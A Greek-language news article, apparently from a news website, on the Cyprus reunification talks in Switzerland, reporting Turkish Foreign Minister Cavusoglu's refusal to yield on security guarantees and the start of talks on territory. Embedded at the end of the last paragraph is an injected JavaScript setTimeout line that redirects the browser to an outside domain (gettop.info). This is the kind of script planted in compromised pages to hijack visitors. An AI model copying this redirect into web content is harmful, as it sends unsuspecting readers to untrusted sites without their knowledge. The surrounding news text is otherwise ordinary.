Ανυποχώρητη η Τουρκία στις εγγυήσεις – Ανοίγει η συζήτηση για το εδαφικό

0
3

 

Σχολιάζοντας τις διαπραγματεύσεις που εξελίσσονται σχετικά με το Κυπριακό στην Ελβετία, ο υπουργός Εξωτερικών της Τουρκίας, Μεβλούτ Τσαβούσογλου δήλωσε πως η χώρα του «δεν πρόκειται να κάνει πίσω στο θέμα των εγγυήσεων».

Ο Τούρκος υπουργός επικαλέστηκε την κρίση στη Συρία, η οποία όπως ανέφερε, «είναι πολύ κοντά στην Κύπρο και αποτελεί απειλή για την ασφάλεια των Τουρκοκυπρίων».

Για τις διαπραγματεύσεις στην Ελβετία, ο κ. Τσαβούσογλου τόνισε ότι «βρίσκονται σε κρίσιμο σημείο» και πρόσθεσε ότι οι δύο πλευρές διένυσαν σημαντική απόσταση στα τέσσερα κεφάλαια, αλλά υπάρχουν και ανοικτά θέματα, όπως η εκ περιτροπής προεδρία.

Σήμερα, στο θέρετρο Μον Πελεράν της Ελβετίας αρχίζει η συζήτηση σχετικά με εδαφικό. Ο Κύπριος Πρόεδρος, Ν. Αναστασιάδης, είχε σύσκεψη με τους στενούς συνεργάτες του, στην οποία εξετάστηκε έγγραφο που ετοίμασαν τα μέλη της διαπραγματευτικής ομάδας για τα κριτήρια επί του εδαφικού.

Οι Αναστασιάδης και Ακιντζί συζήτησαν για πρώτη φορά πτυχές του περιουσιακού, οι οποίες σχετίζονται με το εδαφικό χθες το βράδυ. Σύμφωνα με πληροφορίες, έγινε «μία καλή πρώτη συζήτηση, η οποία θεωρείται προπαρασκευαστική για τη σημερινή διαπραγμάτευση επί του εδαφικού». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here